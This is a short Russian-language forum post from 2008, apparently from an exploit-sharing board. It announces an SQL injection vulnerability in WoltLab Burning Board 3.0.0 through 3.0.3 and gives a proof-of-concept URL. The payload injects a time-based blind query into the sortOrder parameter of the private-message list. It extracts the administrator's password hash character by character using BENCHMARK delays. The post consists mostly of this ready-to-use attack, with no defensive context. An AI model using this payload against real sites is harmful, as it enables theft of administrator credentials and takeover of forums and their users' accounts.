21.02.2008, 04:39
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability
Vulnerable: WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX
WoltLab Burning Board 3.0.1 PLX
WoltLab Burning Board 3.0.0 PLX
PoC:
Код:
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortFi
eld=isViewed&sortOrder=ASC,
(SELECT password FROM wcf1_user WHERE userID=1 AND
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,
MD5(23)),1))
|
|
|